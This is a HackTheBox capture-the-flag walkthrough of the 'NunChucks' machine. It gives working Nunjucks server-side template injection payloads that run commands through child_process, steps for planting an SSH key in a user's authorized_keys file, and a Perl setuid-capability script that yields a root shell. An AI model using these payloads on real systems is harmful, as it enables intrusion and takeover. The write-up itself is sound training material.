HackTheBox Walkthrough : NunChucks

Today we are going to solve another challenge from “Hackthebox” called “nunchucks” created by TheCyberGeek . Lab is based on exploiting express template with remote code execution and abusing the capabilities on Perl binary. So without time let start .

Level : Easy

Attacking Strategy

  • Recon
    • Nmap
  • Enumeration
    • Sub Domain Enumeration
    • Express Template Injection
    • SSTI (Server Side Template Injection)
  • Exploitation
    • SSTI chain to Remote Code Execution
  • Privilege Escalation
    • Privilege Escalation using Capabilities on perl

Walkthrough

IP Address : 10.129.183.214

First step is to recon the services and open ports on target and for this nmap is good player . We start with nmap scan with script scan mode .

nmap -sC -sV -oN nmap 10.129.183.214
Nmap scan report for 10.129.183.214
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6c:14:6d:bb:74:59:c3:78:2e:48:f5:11:d8:5b:47:21 (RSA)
|   256 a2:f4:2c:42:74:65:a3:7c:26:dd:49:72:23:82:72:71 (ECDSA)
|_  256 e1:8d:44:e7:21:6d:7c:13:2f:ea:3b:83:58:aa:02:b3 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://nunchucks.htb/
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Nunchucks - Landing Page
| ssl-cert: Subject: commonName=nunchucks.htb/organizationName=Nunchucks-Certificates/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:localhost, DNS:nunchucks.htb
| Not valid before: 2021-08-30T15:42:24
|_Not valid after:  2031-08-28T15:42:24
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1

Enumeration

Nmap shows port 22 SSH , port 80 for HTTP which is redirecting to http://nunchucks.htb and port 443 is also open for SSL . After adding the nunchucks.htb into /etc/hosts file , we start enumerating the services. We start with port 80 enumeration .

After reading all the content of the website it look like some store or shop based platform and on footer side of the application some of the lines got the attention.

So nunchucks is a SaaS (software as service) application which helps customer to create there online store , shops , inventory , warehouse kind of things. So we add some general subdomain like shop.nunchucks.htb , store.nunchucks.htb into our host file.

When we try to visit shop.nunchucks.htb nothing but when we visit to store.nunchucks.htb it lead to another application on server.

On landing page there is email field where you subscribe to the application . while enumerating application one more interesting things come i.e express framework is used by the application .

After seeing the express framework some of things come in mind, first which hit is some template injection on the application ,so we try SSTI (Server Side Template Injection). Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side for more you can read here. To perform SSTI we simply try to inject some character on email field see the result on burp suite.

Exploitation

So there is template injection vulnerability in application , after searching on internet we come with an article. After reading more articles , blogs , github repo we chain the SSTI to command execution.

"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}"

we got command execution so we try to get reverse shell but failed so we try another method and start enumerating the box , So we can perform password less login to SSH service by putting our public key to server.So first we will create .ssh directory under the user home directory.

"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('mkdir /home/david/.ssh')\")()}}"

After creating directory we simply put or public key under .ssh folder .

"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo {attacker id_rsa.pub }  >/home/david/.ssh/authorized_keys')\")()}}"
"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('chmod +x /home/david/.ssh/*')\")()}}"

Once the key successfully placed on server we can make the login to server with user David.

chmod 600 id_rsa
ssh -i id_rsa [email protected]

Privilege Escalation

Now we get initial foothold on server so its time perform privilege escalation so we start enumerating the box like checking SUID bit files or binaries , SUDOers , path injection ,etc and finally we get the capabilities based privilege escalation. On Perl one capabilities is enabled so we simply do the gtfobin to perform the steps but we didn’t get any success , after searching internet an idea came ,let try by creating bash script and then run it and it worked.

getcap -r / 2>/dev/null
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash -p";

After running bash file we got the root shell and collect the flags.

References

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.